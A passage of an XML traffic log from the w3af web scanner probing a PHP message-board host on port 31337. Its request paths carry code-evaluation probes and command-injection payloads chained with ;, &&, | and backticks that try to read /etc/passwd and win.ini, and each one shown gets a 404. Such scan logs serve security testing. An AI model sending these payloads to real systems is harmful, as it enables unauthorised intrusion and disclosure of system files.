&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="253">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="257">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Response.Write%28new+String%28%22hrsff%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22hrsff%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="258">
                <http-request>
                    <status>GET http://10.12.68.43:31337/print+%27hrsff%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="260">
                <http-request>
                    <status>GET http://10.12.68.43:31337/echo+str_repeat%28%27hrsff%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="261">
                <http-request>
                    <status>GET http://10.12.68.43:31337/print+%27hrsff%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="291">
                <http-request>
                    <status>GET http://10.12.68.43:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="292">
                <http-request>
                    <status>GET http://10.12.68.43:31337/os2mfcpU HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="293">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="294">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="295">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="296">
                <http-request>
                    <status>GET http://10.12.68.43:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="297">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="298">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="299">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="300">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="301">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="302">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="303">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="304">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="306">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="307">
                <http-request>
                    <status>GET http://10.12.68.43:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
